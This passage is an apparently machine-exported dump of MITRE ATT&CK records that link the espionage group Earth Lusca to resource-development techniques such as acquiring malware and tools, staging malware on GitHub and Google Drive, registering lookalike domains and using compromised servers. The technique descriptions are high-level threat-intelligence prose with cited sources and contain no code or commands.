Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}] object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'] x_mitre_attack_spec_version : 2.1.0 x_mitre_deprecated : False x_mitre_domains : ['enterprise-attack', 'mobile-attack'] x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_version : 1.0 technique_ref : attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0 relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has acquired and used a variety of open source tools.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--a8fef3c0-796a-4995-81fe-c47336c3ddbd revoked : False technique : Tool technique_description : Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019) Adversaries may obtain tools to support their operations, including to support execution of post-compromise behaviors. In addition to freely downloading or purchasing software, adversaries may steal software and/or software licenses from third-party entities (including other adversaries). 
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='resource-development')] technique_id : T1588.002 matrix : mitre-attack platform : ['PRE'] data_sources : ['Malware Repository: Malware Metadata'] ---------------------------------------------------------------------------------------------------- type : intrusion-set id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034 created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 created : 2022-07-01T20:12:30.184Z modified : 2022-10-17T19:51:56.531Z name : Earth Lusca description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022) [Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022) aliases : ['Earth Lusca', 'TAG-22'] external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': 
'(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}] object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'] x_mitre_attack_spec_version : 2.1.0 x_mitre_deprecated : False x_mitre_domains : ['enterprise-attack', 'mobile-attack'] x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_version : 1.0 technique_ref : attack-pattern--7807d3a4-a885-4639-a786-c1ed41484970 relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has acquired and used a variety of malware, including [Cobalt Strike](https://attack.mitre.org/software/S0154).(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--e607a77e-5c5c-4f3e-a62d-82124a434911 revoked : False technique : Malware technique_description : Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors. 
In addition to downloading free malware from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware development, criminal marketplaces (including Malware-as-a-Service, or MaaS), or from individuals. In addition to purchasing malware, adversaries may steal and repurpose malware from third-party entities (including other adversaries). tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='resource-development')] technique_id : T1588.001 matrix : mitre-attack platform : ['PRE'] data_sources : ['Malware Repository: Malware Metadata', 'Malware Repository: Malware Content'] ---------------------------------------------------------------------------------------------------- type : intrusion-set id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034 created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 created : 2022-07-01T20:12:30.184Z modified : 2022-10-17T19:51:56.531Z name : Earth Lusca description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. 
Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022) [Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022) aliases : ['Earth Lusca', 'TAG-22'] external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. 
Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}] object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'] x_mitre_attack_spec_version : 2.1.0 x_mitre_deprecated : False x_mitre_domains : ['enterprise-attack', 'mobile-attack'] x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_version : 1.0 technique_ref : attack-pattern--88d31120-5bc7-4ce3-a9c0-7cf147be8e54 relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has established GitHub accounts to host their malware.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--0167e4ad-b828-4813-88bf-f5b03b4d3268 revoked : False technique : Web Services technique_description : Adversaries may register for web services that can be used during targeting. A variety of popular websites exist for adversaries to register for a web-based service that can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)), [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567), or [Phishing](https://attack.mitre.org/techniques/T1566). Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, adversaries can make it difficult to physically tie back operations to them. 
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='resource-development')] technique_id : T1583.006 matrix : mitre-attack platform : ['PRE'] data_sources : ['Internet Scan: Response Content'] ---------------------------------------------------------------------------------------------------- type : intrusion-set id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034 created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 created : 2022-07-01T20:12:30.184Z modified : 2022-10-17T19:51:56.531Z name : Earth Lusca description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022) [Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022) aliases : ['Earth Lusca', 'TAG-22'] external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: 
Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}] object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'] x_mitre_attack_spec_version : 2.1.0 x_mitre_deprecated : False x_mitre_domains : ['enterprise-attack', 'mobile-attack'] x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_version : 1.0 technique_ref : attack-pattern--ae797531-3219-49a4-bccf-324ad7a4c7b2 relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has compromised Google Drive repositories.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--2dc666e3-b715-425c-b8b4-f3c0f7d6d8e9 revoked : False technique : Web Services technique_description : Adversaries may compromise access to third-party web services that can be used during targeting. A variety of popular websites exist for legitimate users to register for web-based services, such as GitHub, Twitter, Dropbox, Google, SendGrid, etc. Adversaries may try to take ownership of a legitimate user's access to a web service and use that web service as infrastructure in support of cyber operations. 
Such web services can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)), [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567), or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Recorded Future Turla Infra 2020) Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, particularly when access is stolen from legitimate users, adversaries can make it difficult to physically tie back operations to them. Additionally, leveraging compromised web-based email services may allow adversaries to leverage the trust associated with legitimate domains. tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='resource-development')] technique_id : T1584.006 matrix : mitre-attack platform : ['PRE'] data_sources : ['Internet Scan: Response Content'] ---------------------------------------------------------------------------------------------------- type : intrusion-set id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034 created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 created : 2022-07-01T20:12:30.184Z modified : 2022-10-17T19:51:56.531Z name : Earth Lusca description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. 
Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022) [Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022) aliases : ['Earth Lusca', 'TAG-22'] external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. 
Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}] object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'] x_mitre_attack_spec_version : 2.1.0 x_mitre_deprecated : False x_mitre_domains : ['enterprise-attack', 'mobile-attack'] x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_version : 1.0 technique_ref : attack-pattern--3ee16395-03f0-4690-a32e-69ce9ada0f9e relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has staged malware and malicious files on compromised web servers, GitHub, and Google Drive.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--0e837480-f359-4bdc-875a-d953027d17b0 revoked : False technique : Upload Malware technique_description : Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server. Malware may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). 
Malware can also be staged on web services, such as GitHub or Pastebin, or hosted on the InterPlanetary File System (IPFS), where decentralized content storage makes the removal of malicious files difficult.(Citation: Volexity Ocean Lotus November 2020)(Citation: Talos IPFS 2022) Adversaries may upload backdoored files, such as application binaries, virtual machine images, or container images, to third-party software stores or repositories (ex: GitHub, CNET, AWS Community AMIs, Docker Hub). By chance encounter, victims may directly download/install these backdoored files via [User Execution](https://attack.mitre.org/techniques/T1204). [Masquerading](https://attack.mitre.org/techniques/T1036) may increase the chance of users mistakenly executing these files. tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='resource-development')] technique_id : T1608.001 matrix : mitre-attack platform : ['PRE'] data_sources : ['Internet Scan: Response Content'] ---------------------------------------------------------------------------------------------------- type : intrusion-set id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034 created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 created : 2022-07-01T20:12:30.184Z modified : 2022-10-17T19:51:56.531Z name : Earth Lusca description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. 
Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022) [Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022) aliases : ['Earth Lusca', 'TAG-22'] external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. 
Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}] object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'] x_mitre_attack_spec_version : 2.1.0 x_mitre_deprecated : False x_mitre_domains : ['enterprise-attack', 'mobile-attack'] x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_version : 1.0 technique_ref : attack-pattern--40f5caa0-4cb7-4117-89fc-d421bb493df3 relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has registered domains, intended to look like legitimate target domains, that have been used in watering hole attacks.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--5ce84367-05cc-446e-a744-08a46f103552 revoked : False technique : Domains technique_description : Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free. Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) 
to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing) Adversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history.(Citation: Categorisation_not_boundary)(Citation: Domain_Steal_CC)(Citation: Redirectors_Domain_Fronting)(Citation: bypass_webproxy_filtering) Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1) tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='resource-development')] technique_id : T1583.001 matrix : mitre-attack platform : ['PRE'] data_sources : ['Domain Name: Passive DNS', 'Domain Name: Domain Registration', 'Domain Name: Active DNS'] ---------------------------------------------------------------------------------------------------- type : intrusion-set id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034 created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 created : 2022-07-01T20:12:30.184Z modified : 2022-10-17T19:51:56.531Z name : Earth Lusca description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. 
[Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022) [Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022) aliases : ['Earth Lusca', 'TAG-22'] external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. 
Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}] object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'] x_mitre_attack_spec_version : 2.1.0 x_mitre_deprecated : False x_mitre_domains : ['enterprise-attack', 'mobile-attack'] x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_version : 1.0 technique_ref : attack-pattern--e196b5c5-8118-4a1c-ab8a-936586ce3db5 relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has used compromised web servers as part of their operational infrastructure.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--ff6f4b5b-1b5f-4f8f-9307-345a3c278151 revoked : False technique : Server technique_description : Adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of purchasing a [Server](https://attack.mitre.org/techniques/T1583/004) or [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may compromise third-party servers in support of operations. Adversaries may also compromise web servers to support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or email servers to support [Phishing](https://attack.mitre.org/techniques/T1566) operations. 
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='resource-development')] technique_id : T1584.004 matrix : mitre-attack platform : ['PRE'] data_sources : ['Internet Scan: Response Content', 'Internet Scan: Response Metadata'] ---------------------------------------------------------------------------------------------------- type : intrusion-set id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034 created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 created : 2022-07-01T20:12:30.184Z modified : 2022-10-17T19:51:56.531Z name : Earth Lusca description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022) [Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022) aliases : ['Earth Lusca', 'TAG-22'] external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 
'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}] object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'] x_mitre_attack_spec_version : 2.1.0 x_mitre_deprecated : False x_mitre_domains : ['enterprise-attack', 'mobile-attack'] x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_version : 1.0 technique_ref : attack-pattern--60c4b628-4807-4b0b-bbf5-fdac8643c337 relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has acquired multiple servers for some of their operations, using each server for a different role.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--dd033098-eb56-4c17-90d7-c7673f04bcd6 revoked : False technique : Server technique_description : Adversaries may buy, lease, or rent physical servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. 
Adversaries may use web servers to support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or email servers to support [Phishing](https://attack.mitre.org/techniques/T1566) operations. Instead of compromising a third-party [Server](https://attack.mitre.org/techniques/T1584/004) or renting a [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may opt to configure and run their own servers in support of operations. Adversaries may only need a lightweight setup if most of their activities will take place using online infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems.(Citation: NYTStuxnet) tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='resource-development')] technique_id : T1583.004 matrix : mitre-attack platform : ['PRE'] data_sources : ['Internet Scan: Response Metadata', 'Internet Scan: Response Content'] ---------------------------------------------------------------------------------------------------- type : intrusion-set id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034 created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 created : 2022-07-01T20:12:30.184Z modified : 2022-10-17T19:51:56.531Z name : Earth Lusca description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. 
